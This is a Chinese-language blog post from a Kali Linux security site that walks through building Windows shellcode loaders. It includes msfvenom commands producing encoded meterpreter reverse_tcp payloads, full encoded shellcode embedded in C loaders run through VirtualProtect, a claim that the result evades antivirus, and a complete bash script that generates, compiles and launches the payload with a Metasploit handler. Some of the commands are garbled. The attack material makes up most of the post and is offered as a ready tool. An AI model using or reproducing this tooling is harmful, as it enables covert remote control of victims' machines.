登录
    最新消息:
    你的位置:即刻安全 > Kali Linux > 我的shellcode编写之路 |MSF| Shellcode | kali linux 2017

    我的shellcode编写之路 |MSF| Shellcode | kali linux 2017

    Kali Linux demon 37641浏览 0评论

    1.我有一个大胆的想法

    其实shellcode的这篇的灵感也是在与和车王两人的沟通,在他的带领下 也是才知道https://www.exploit-db.com/?原来也有shellcode的一篇新的视角,也是在第二天的时间,也是偷偷的趁着上班的空余时间 研究了一下,上帝第一视角。也是蛮有意思的事情。在shellcode中包含了很多平台的shellcode。

     

    2.无心插柳柳成荫

    当我无意间浏览到某篇文章后,已经吸引了我的注意力了?https://www.exploit-db.com/exploits/37758/

    3.shellcode 弹窗hellword 警告窗口

    # include <stdlib.h>
# include <stdio.h>
# include <string.h>
 
# include <windows.h>
 
 
int
main(void)
{
  char *shellcode = "\x33\xc9\x64\x8b\x49\x30\x8b\x49\x0c\x8b"
    "\x49\x1c\x8b\x59\x08\x8b\x41\x20\x8b\x09"
    "\x80\x78\x0c\x33\x75\xf2\x8b\xeb\x03\x6d"
    "\x3c\x8b\x6d\x78\x03\xeb\x8b\x45\x20\x03"
    "\xc3\x33\xd2\x8b\x34\x90\x03\xf3\x42\x81"
    "\x3e\x47\x65\x74\x50\x75\xf2\x81\x7e\x04"
    "\x72\x6f\x63\x41\x75\xe9\x8b\x75\x24\x03"
    "\xf3\x66\x8b\x14\x56\x8b\x75\x1c\x03\xf3"
    "\x8b\x74\x96\xfc\x03\xf3\x33\xff\x57\x68"
    "\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68"
    "\x4c\x6f\x61\x64\x54\x53\xff\xd6\x33\xc9"
    "\x57\x66\xb9\x33\x32\x51\x68\x75\x73\x65"
    "\x72\x54\xff\xd0\x57\x68\x6f\x78\x41\x01"
    "\xfe\x4c\x24\x03\x68\x61\x67\x65\x42\x68"
    "\x4d\x65\x73\x73\x54\x50\xff\xd6\x57\x68"
    "\x72\x6c\x64\x21\x68\x6f\x20\x57\x6f\x68"
    "\x48\x65\x6c\x6c\x8b\xcc\x57\x57\x51\x57"
    "\xff\xd0\x57\x68\x65\x73\x73\x01\xfe\x4c"
    "\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78"
    "\x69\x74\x54\x53\xff\xd6\x57\xff\xd0";
 
  DWORD why_must_this_variable;
  BOOL ret = VirtualProtect (shellcode, strlen(shellcode),
    PAGE_EXECUTE_READWRITE, &why_must_this_variable);
 
  if (!ret) {
    printf ("VirtualProtect\n");
    return EXIT_FAILURE;
  }
 
  printf("strlen(shellcode)=%d\n", strlen(shellcode));
 
  ((void (*)(void))shellcode)();
 
  return EXIT_SUCCESS;
}

    我们来手动的进行编译一下看看具体的效果如何 是不是和他说的一样 会弹框 (hello word)

    4.得到的信息和回顾学过的知识

    可以看到弹窗的内容是helloword ,也可以看到代码中并无helloword的字符串以及MessageBox 的调用,也就是相关重点的代码就在于shellcode的硬编码。

    那么这就让我想到了msfvenom的shellcode代码 ,由msfvenom生成的恶意的shellcode的。也就是以c生成shellcode硬编码。相关如何的msfvenom

    也可以在https://github.com/demonsec666/secist_script?中找到我之前录制的msf课程中的第五课 也有提到过msfvenom的教程 ,亦可以查看官方文档https://www.offensive-security.com/metasploit-unleashed/msfvenom/

    5.shellcode_msfvenom

    本篇就以/www.offensive-security.com 中的msfvenom 教程为例

    root@kali:~# msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp -e x86/shikata_ga_nai -b '\x00' -i 3 -f python
Found 1 compatible encoders
Attempting to encode payload with 3 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 326 (iteration=0)
x86/shikata_ga_nai succeeded with size 353 (iteration=1)
x86/shikata_ga_nai succeeded with size 380 (iteration=2)
x86/shikata_ga_nai chosen with final size 380
Payload size: 380 bytes
buf = ""
buf += "\xbb\x78\xd0\x11\xe9\xda\xd8\xd9\x74\x24\xf4\x58\x31"
buf += "\xc9\xb1\x59\x31\x58\x13\x83\xc0\x04\x03\x58\x77\x32"
buf += "\xe4\x53\x15\x11\xea\xff\xc0\x91\x2c\x8b\xd6\xe9\x94"
buf += "\x47\xdf\xa3\x79\x2b\x1c\xc7\x4c\x78\xb2\xcb\xfd\x6e"
buf += "\xc2\x9d\x53\x59\xa6\x37\xc3\x57\x11\xc8\x77\x77\x9e"
buf += "\x6d\xfc\x58\xba\x82\xf9\xc0\x9a\x35\x72\x7d\x01\x9b"
buf += "\xe7\x31\x16\x82\xf6\xe2\x89\x89\x75\x67\xf7\xaa\xae"
buf += "\x73\x88\x3f\xf5\x6d\x3d\x9e\xab\x06\xda\xff\x42\x7a"
buf += "\x63\x6b\x72\x59\xf6\x58\xa5\xfe\x3f\x0b\x41\xa0\xf2"
buf += "\xfe\x2d\xc9\x32\x3d\xd4\x51\xf7\xa7\x56\xf8\x69\x08"
buf += "\x4d\x27\x8a\x2e\x19\x99\x7c\xfc\x63\xfa\x5c\xd5\xa8"
buf += "\x1f\xa8\x9b\x88\xbb\xa5\x3c\x8f\x7f\x38\x45\xd1\x71"
buf += "\x34\x59\x84\xb0\x97\xa0\x99\xcc\xfe\x7f\x37\xe2\x28"
buf += "\xea\x57\x01\xcf\xf8\x1e\x1e\xd8\xd3\x05\x67\x73\xf9"
buf += "\x32\xbb\x76\x8c\x7c\x2f\xf6\x29\x0f\xa5\x36\x2e\x73"
buf += "\xde\x31\xc3\xfe\xae\x49\x64\xd2\x39\xf1\xf2\xc7\xa0"
buf += "\x06\xd3\xf6\x1a\xfe\x0a\xfe\x28\xbe\x1a\x42\x9c\xde"
buf += "\x01\x16\x27\xbd\x29\x1c\xf8\x7d\x47\x2c\x68\x06\x0e"
buf += "\x23\x31\xfe\x7d\x58\xe8\x7b\x76\x4b\xfe\xdb\x17\x51"
buf += "\xfa\xdf\xff\xa1\xbc\xc5\x66\x4b\xea\x23\x86\x47\xb4"
buf += "\xe7\xd5\x71\x77\x2e\x24\x4a\x3d\xb1\x6f\x12\xf2\xb2"
buf += "\xd0\x55\xc9\x23\x2e\xc2\xa5\x73\xb2\xc8\xb7\x7d\x6b"
buf += "\x55\x29\xbc\x26\xdd\xf6\xe3\xf6\x25\xc6\x5c\xad\x9c"
buf += "\x9d\x18\x08\x3b\xbf\xd2\xff\x92\x18\x5f\x48\x9b\xe0"
buf += "\x7b\x03\xa5\x32\x11\x27\x2b\x25\xcd\x44\xdb\xbd\xb9"
buf += "\xcd\x48\xda\x56\x4c\x56\xd5\x04\x87\x48\x3a\x6b\x9c"
buf += "\x2a\x15\x4d\xbc\x0b\x56\x06\xb5\xc9\x46\xd0\xfa\x68"
buf += "\xa6\x76\xe9\x52\x2c\x24\x62\x28\xe1\x1d\x87\xb0\x66"
buf += "\x93\x85\x8f\x87\x0f\xcf\x16\x29\x76\x03\x55\x0c\x0e"
buf += "\x3f\x17\xac"

    可以看到使用msfvenom 自动帮我们生成恶意的shellcode

    • 其中的-a 代表 的是目标的架构 如:x86
    • –platform 代表的是一个目标机的平台 如: windows
    • 那么-p 呢 代表的是msf的payload的以及-e 和-b 呢 代表这个 encoder编码器,-b 表示去除硬编码中的0x00代码,因为0x00代表着结束的符号,所以我们不能让他出现0x00这个代码。
    • 最后的 -i 和-f 分别代表的是iterations和format (迭代次数和格式)

    那么我们将其代码重新改改,我们比如需要的功能是meterperter、指定ip和端口、指定shellcode 编码格式如:c或者python等代码

    msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击者IP地址  LPORT=攻击者端口  -e x86/shikata_ga_nai -b '\x00' -i 迭代次数  -f  c

    那么简短来说就是

    -p去指定payload为 windows/meterpreter/reverse_tcp
LHOST 和LPORT 指定攻击者ip和端口
-e指定x86/shikata_ga_nai 编码器
-i 指定迭代为如 5次 或10次等
-f 指定输出的格式 如c 代码 、或者python等其他格式的代码 
-f参数可以参考msfvenom的帮助参数 查看-f的支持格式

    6.shellcode_c_msf

    最终我们可以得到由msfvenom 生成C的shellcode代码

    msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp  LHOST=192.168.1.100 LPORT=4444 -e x86/shikata_ga_nai -b '\x00' -i 4 -f c
Found 1 compatible encoders
Attempting to encode payload with 4 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 360 (iteration=0)
x86/shikata_ga_nai succeeded with size 387 (iteration=1)
x86/shikata_ga_nai succeeded with size 414 (iteration=2)
x86/shikata_ga_nai succeeded with size 441 (iteration=3)
x86/shikata_ga_nai chosen with final size 441
Payload size: 441 bytes
Final size of c file: 1878 bytes
unsigned char buf[] = 
"\xd9\xe1\xbf\xc4\xbd\x41\x38\xd9\x74\x24\xf4\x5e\x31\xc9\xb1"
"\x68\x31\x7e\x19\x83\xee\xfc\x03\x7e\x15\x26\x48\x9a\xec\x1c"
"\x99\x40\x70\xdd\x07\x0e\xae\xe9\xe6\xc6\x67\xa0\x76\x28\x2e"
"\xd8\x7b\x1c\xd4\x5f\x95\x5c\x0a\x80\xed\x24\xaf\x55\xee\xe0"
"\xf9\x80\x7f\x1a\x88\x1f\xde\xba\xa7\x09\x17\x25\x1f\x2c\x37"
"\x5d\x53\x6c\x7a\x01\xd2\x99\x69\x5b\x61\x14\x0a\xe1\x2b\xe1"
"\x62\x0c\x07\x9b\x67\xe4\x56\x2f\xf8\xa0\x7e\xdd\xfe\x6d\x0f"
"\xa2\x0e\xfc\x24\xcd\xce\xc0\xa3\x8b\x96\xe5\x1b\x26\xbd\x58"
"\x8d\xcc\x2b\x71\xe4\x37\xda\xb7\xca\x2e\xe1\xe2\x19\xd9\xbf"
"\x29\x5c\xed\x2b\x32\x0f\x9f\x81\x59\xf9\x3b\x31\x57\xe1\x38"
"\x75\x55\xa9\xa8\x30\x8e\xa2\x1e\x9e\x65\xaa\x5f\xe7\x43\xc7"
"\x1e\x06\xc7\x6d\x0f\xb8\x09\xf1\xa7\xaa\x3e\x82\xb0\xf5\x7e"
"\xf6\x08\xe1\x90\xc5\x98\xd0\x11\xe9\x78\xd6\xa6\x44\xf4\x1a"
"\xe9\x7d\x83\xec\x57\xd9\xb5\x80\x0b\x5f\x98\xc8\xec\xeb\x3f"
"\x09\x17\xc8\xad\x8a\x5f\xc6\x6f\x8f\xa3\x11\x7c\x7c\x3e\x25"
"\x44\x62\xbd\xd3\x94\xe8\x0b\x3e\xd9\xbe\x05\x71\x89\x98\x6b"
"\xe3\x4a\x36\x34\x9e\xa6\x90\xee\x69\x13\x16\xa0\x9a\xf5\x68"
"\x53\x22\xdc\x6f\x59\x54\x53\x8a\x25\x31\x40\x3e\x03\x85\xc9"
"\x3b\x1c\xb9\xb1\x6b\xe9\x42\xec\xda\x5f\x24\x8a\x81\x37\x90"
"\xe3\xb0\xe8\xd7\xfe\x8e\xfc\x0b\xc4\xde\x75\x73\x40\x14\x24"
"\x2c\x03\xf0\xfd\x65\x7c\xbf\xe8\xd3\xa2\x80\x16\xd1\x32\x36"
"\x36\x30\x1e\x71\x4f\xe9\x60\x47\x91\xcf\x0c\xf0\xeb\xc3\xe6"
"\xbf\x98\x1a\x3a\x38\xfa\x56\x40\x9e\x4e\x51\xc2\xcb\xc2\x48"
"\xe5\xbf\x0d\xec\xb2\x37\x01\x9f\x7a\xdf\x3a\xde\x30\xe0\x04"
"\xb6\x07\x5e\x5c\x65\x1c\xfd\x24\x02\xbd\x8f\x2c\xba\xdc\xbd"
"\x27\x2a\xe0\x08\x74\xf9\xda\x8b\x4a\xaf\x46\xaf\x67\xd1\x42"
"\x9d\xb5\x11\x70\xd7\x5c\xf0\x36\x1f\x87\x42\x99\xa4\x57\x64"
"\x8f\xf7\xda\x03\x42\x35\x85\x6e\xd5\x6b\xa6\xcd\xdb\x8c\x2f"
"\x37\x62\xef\xfe\x61\xab\xeb\xde\x37\xd8\x5e\x77\x7f\x86\x18"
"\x88\x80\xd4\x02\xe7\x8b";

    7.编译、监听、运行

    那么我们得了到了msfvenom生成的shellcode,那么我们将其带入之前弹框的hellword代码中,写出以下代码:

     # include <stdlib.h>
  # include <stdio.h>
  # include <string.h>
  # include <windows.h>
  int
  main(void)
  {
  	char *shellcode =
    #Shellcode的代码
"\xd9\xe1\xbf\xc4\xbd\x41\x38\xd9\x74\x24\xf4\x5e\x31\xc9\xb1"
"\x68\x31\x7e\x19\x83\xee\xfc\x03\x7e\x15\x26\x48\x9a\xec\x1c"
"\x99\x40\x70\xdd\x07\x0e\xae\xe9\xe6\xc6\x67\xa0\x76\x28\x2e"
"\xd8\x7b\x1c\xd4\x5f\x95\x5c\x0a\x80\xed\x24\xaf\x55\xee\xe0"
"\xf9\x80\x7f\x1a\x88\x1f\xde\xba\xa7\x09\x17\x25\x1f\x2c\x37"
"\x5d\x53\x6c\x7a\x01\xd2\x99\x69\x5b\x61\x14\x0a\xe1\x2b\xe1"
"\x62\x0c\x07\x9b\x67\xe4\x56\x2f\xf8\xa0\x7e\xdd\xfe\x6d\x0f"
"\xa2\x0e\xfc\x24\xcd\xce\xc0\xa3\x8b\x96\xe5\x1b\x26\xbd\x58"
"\x8d\xcc\x2b\x71\xe4\x37\xda\xb7\xca\x2e\xe1\xe2\x19\xd9\xbf"
"\x29\x5c\xed\x2b\x32\x0f\x9f\x81\x59\xf9\x3b\x31\x57\xe1\x38"
"\x75\x55\xa9\xa8\x30\x8e\xa2\x1e\x9e\x65\xaa\x5f\xe7\x43\xc7"
"\x1e\x06\xc7\x6d\x0f\xb8\x09\xf1\xa7\xaa\x3e\x82\xb0\xf5\x7e"
"\xf6\x08\xe1\x90\xc5\x98\xd0\x11\xe9\x78\xd6\xa6\x44\xf4\x1a"
"\xe9\x7d\x83\xec\x57\xd9\xb5\x80\x0b\x5f\x98\xc8\xec\xeb\x3f"
"\x09\x17\xc8\xad\x8a\x5f\xc6\x6f\x8f\xa3\x11\x7c\x7c\x3e\x25"
"\x44\x62\xbd\xd3\x94\xe8\x0b\x3e\xd9\xbe\x05\x71\x89\x98\x6b"
"\xe3\x4a\x36\x34\x9e\xa6\x90\xee\x69\x13\x16\xa0\x9a\xf5\x68"
"\x53\x22\xdc\x6f\x59\x54\x53\x8a\x25\x31\x40\x3e\x03\x85\xc9"
"\x3b\x1c\xb9\xb1\x6b\xe9\x42\xec\xda\x5f\x24\x8a\x81\x37\x90"
"\xe3\xb0\xe8\xd7\xfe\x8e\xfc\x0b\xc4\xde\x75\x73\x40\x14\x24"
"\x2c\x03\xf0\xfd\x65\x7c\xbf\xe8\xd3\xa2\x80\x16\xd1\x32\x36"
"\x36\x30\x1e\x71\x4f\xe9\x60\x47\x91\xcf\x0c\xf0\xeb\xc3\xe6"
"\xbf\x98\x1a\x3a\x38\xfa\x56\x40\x9e\x4e\x51\xc2\xcb\xc2\x48"
"\xe5\xbf\x0d\xec\xb2\x37\x01\x9f\x7a\xdf\x3a\xde\x30\xe0\x04"
"\xb6\x07\x5e\x5c\x65\x1c\xfd\x24\x02\xbd\x8f\x2c\xba\xdc\xbd"
"\x27\x2a\xe0\x08\x74\xf9\xda\x8b\x4a\xaf\x46\xaf\x67\xd1\x42"
"\x9d\xb5\x11\x70\xd7\x5c\xf0\x36\x1f\x87\x42\x99\xa4\x57\x64"
"\x8f\xf7\xda\x03\x42\x35\x85\x6e\xd5\x6b\xa6\xcd\xdb\x8c\x2f"
"\x37\x62\xef\xfe\x61\xab\xeb\xde\x37\xd8\x5e\x77\x7f\x86\x18"
"\x88\x80\xd4\x02\xe7\x8b";
  	DWORD why_must_this_variable;
  	BOOL ret = VirtualProtect(shellcode, strlen(shellcode),
  		PAGE_EXECUTE_READWRITE, &why_must_this_variable);
  	if (!ret) {
  		printf("VirtualProtect\n");
  		return EXIT_FAILURE;
  	}
  	((void(*)(void))shellcode)();
  	return 0;
  }

    编译可以使用vs微软的编译器也可以和我一样使用tdm-gcc。

    关于TDM-GCC在我的项目中有提到过:https://github.com/demonsec666/secist_script

    • 使用TDM-GCC 虽然有报错 ,但是也不影响最终得到会话的结果
    • 其中的-M32 代表指的是32位 以及-W -Wall 是忽略警告的意思,其他的我就不用多说了吧
    • 也可以使用vs进行编译生成exe。

    以下是我在win下编译运行测试得到的结果,也是同样绕过杀软的安全防护

    8.Bash下的编写思路形成懒人自动化的脚本

    我们要考虑几点内容:

    1. 如何将我们生成的shellcode代码代入到cpp当中
    2. 如何指定ip和端口 自动化的帮我们完成所有事情
    3. 如何将我们生成的shellcode代码代入到cpp当中

    其实我们可以使用echo结合$变量符大法将其重定向到缓存文件中去,如下所示

    echo $(msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp  LHOST=192.168.1.100 LPORTta_ga_nai -b '\x00' -i 4 -f c) >>  shellcode.txt

    写到缓存文件我们是不是马上可以放入到cpp中去呢?其实不是 细心的朋友可以发现shellcode.txt中包含着 unsigned char buf[] = 的字符串。所以我们需要用的一个命令 => sed ,使用sed 删除匹配unsigned char buf[] = 的字符串,也就是说得到以下命令

      
sed 's/unsigned char buf\[\] =//g'

    完整命令

    echo $(msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp  LHOST=192.168.1.100 LPORTta_ga_nai -b '\x00' -i 4 -f c)  | sed 's/unsigned char buf\[\] =//g' >>  shellcode.txt

    第一个问题解决了 讲msfvenom的shellcode存储到缓存文件中 ,那么我们需要得到完整的cpp文件该如何做呢?

    echo $(msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp  LHOST=192.168.1.100 LPORTta_ga_nai -b '\x00' -i 4 -f c)  | sed 's/unsigned char buf\[\] =//g' >>   shellcode.txt
 echo  "
 # include <stdlib.h>
 # include <stdio.h>
 # include <string.h>
 # include <windows.h>
 int
 main(void)
 {
 	char *shellcode =
   $Shellcode
 	DWORD why_must_this_variable;
 	BOOL ret = VirtualProtect(shellcode, strlen(shellcode),
 		PAGE_EXECUTE_READWRITE, &why_must_this_variable);
 	if (!ret) {
 		printf(\"VirtualProtect\n\");
 		return EXIT_FAILURE;
 	}
 	((void(*)(void))shellcode)();
 	return 0;
 }
 " >> output/shellcode.cpp

    我们将得到的shellcode.txt 使用cat命令 将它输出 并且存储在一个变量中,如我使用的变量$shellcode,并将其变量代入到c代码中去这样也就完整的输出成我们想要的编译文件。

    那么我们又如何指定ip和端口自动化的帮我们完成所有事情呢?在bash编程中我们使用read语法 ,read 就是接受用户键入的字符串。那么我们可以将其写成这样的:

    echo -e "       secist>请输入你的ip地址: \c"
read ip
echo -e "       secist>请输入你的端口: \c"
read port
echo -e "       secist>编码次数(1-500): \c"
read encode

    分别将ip地址、端口、编码迭代次数。存储到ip、port、encode变量中。

    9.开启上帝视角

    最终我的个人完整代码为:

    shellcode?(){
    clear

    echo??-e?”?????????<?Shellcode?Payload?>”
    echo??-e?”??????????——————–”
    echo?-e?”?????????????????????????????\???^__^?????????????”
    echo?-e?”??????????????????????????????\??(oo)\_______?????”
    echo?-e?”?????????????????????????????????(__)\???????)\/\?”
    echo?-e?”?????????????????????????????????????||—-w?|????”
    echo?-e?”?????????????????????????????????????||?????||?????”
    echo?”??”
    echo?-e?”??+————++————————-++———————–+”
    echo??????”?????????????即刻安全周年庆版v1.7?(secist—-2017.7.14)”
    echo?”?”
    echo?-e?”????????????你的IP地址?:\c”
    /sbin/ifconfig?-a|grep?inet|grep?-v?127.0.0.1|grep?-v?inet6|awk?'{print?$2}’|tr?-d?”addr:”
    echo?”????????????系统版本?:$(cat?/etc/issue)”
    echo?-e?”??+————++————————-++———————–+”
    echo?”??”
    echo?”????????[1]?Meterpreter_Reverse_tcp ?[5]?Shell_reverse_tcp”
    echo?”????????[2]?Meterpreter_Reverse_http ?????????[6]?exit”
    echo?”????????[3]?Meterpreter_Reverse_https ?”
    echo?”????????[4]?Meterpreter_Reverse_tcp_dns??????????”
    echo?”????????[7]?back?meun?????”
    echo?””
    echo?-e?”??????????????secist>?\c”
    read?option

    #Aukeratu
    case?$option?in
    1)
    payload=’windows/meterpreter/reverse_tcp’
    ;;
    2)
    payload=’windows/meterpreter/reverse_http’
    ;;
    3)
    payload=’windows/meterpreter/reverse_https’
    ;;
    4)
    payload=’windows/meterpreter/reverse_tcp_dns’
    ;;
    5)
    payload=’windows/shell/reverse_tcp’
    ;;
    6)
    exit
    ;;
    7)
    menu
    ;;
    *)
    shellcode
    ;;
    esac
    if?[?”$option”?==?”1″?];?then
    shellcode1
    elif?[?”$option”?==?”2″?];?then
    shellcode1
    elif?[?”$option”?==?”3″?];?then
    shellcode1

    elif?[?”$option”?==?”4″?];?then
    shellcode1

    elif?[?”$option”?==?”5″?];?then
    shellcode1

    elif?[?”$option”?==?”6″?];?then
    exit

    elif?[?”$option”?==?”7″?];?then
    menu
    fi
    }

    shellcode1(){
    #定义了一个菜单为shellcode1
    echo?-e?”???????secist>请输入你的ip地址:?\c”
    read?ip
    echo?-e?”???????secist>请输入你的端口:?\c”
    read?port
    echo?-e?”???????secist>编码次数(1-500):?\c”
    read?encode
    echo??$(?msfvenom?-a?x86?–platform?Windows?-p?windows/meterpreter/reverse_tcp?LHOST=$ip??LPORT=$port?-e?x86/shikata_ga_nai?-b?’\x00′?-i?$encode?-f?c)?|?sed?’s/unsigned?char?buf\[\]?=//g’?>>?output/shellcode.txt
    Shellcode=$(cat?output/shellcode.txt)
    echo??”
    #?include?<stdlib.h>
    #?include?<stdio.h>
    #?include?<string.h>

    #?include?<windows.h>

     

    int
    main(void)
    {
    char?*shellcode?=

    $Shellcode

     

    DWORD?why_must_this_variable;
    BOOL?ret?=?VirtualProtect(shellcode,?strlen(shellcode),
    PAGE_EXECUTE_READWRITE,?&why_must_this_variable);

    if?(!ret)?{
    printf(\”VirtualProtect\n\”);
    return?EXIT_FAILURE;
    }
    ((void(*)(void))shellcode)();

    return?0;
    }

    “?>>?output/shellcode.cpp

    wine?gcc?-m32?-W?-Wall?-o?output/shellcode.exe?output/shellcode.cpp
    rm?output/shellcode.txt?output/shellcode.cpp
    echo?-e?”??+————++————————-++———————–+”
    echo?-e?”??|?Name???????||??Descript??? ??????????||?Your?Input?????????????”
    echo?-e?”??+————++————————-++———————–+”
    echo?-e?”??|?LHOST??????||??The?Listen?Addres??????||?$ip????????????????????”
    echo?-e?”??|?LPORT??????||??The?Listen?Ports???????||?$port??????????????????”
    echo?-e?”??|?OUTPUTNAME?||??The?Filename?output????||?output/shellcode.exe???”
    echo?-e?”??+————++————————-++———————–+”
    echo?”use?exploit/multi/handler”?>>?resource/handler.rc
    echo?”set?PAYLOAD?$payload”?>>?resource/handler.rc
    echo?”set?LHOST?$ip”?>>??resource/handler.rc
    echo?”set?LPORT?$port”?>>??resource/handler.rc
    echo?”exploit?”?>>??resource/handler.rc
    msfconsole?-r??resource/handler.rc
    }

    视频彩蛋

    *在GitHub中我已经上传了相关的脚本文件,大家可以自行下载。同时,也希望大家能持续关注我们即刻安全未来的动态!谢谢!

    转载请注明:即刻安全 » 我的shellcode编写之路 |MSF| Shellcode | kali linux 2017

    与本文相关的文章

    您必须 登录 才能发表评论!

    网友最新评论 (2)

    

    合作伙伴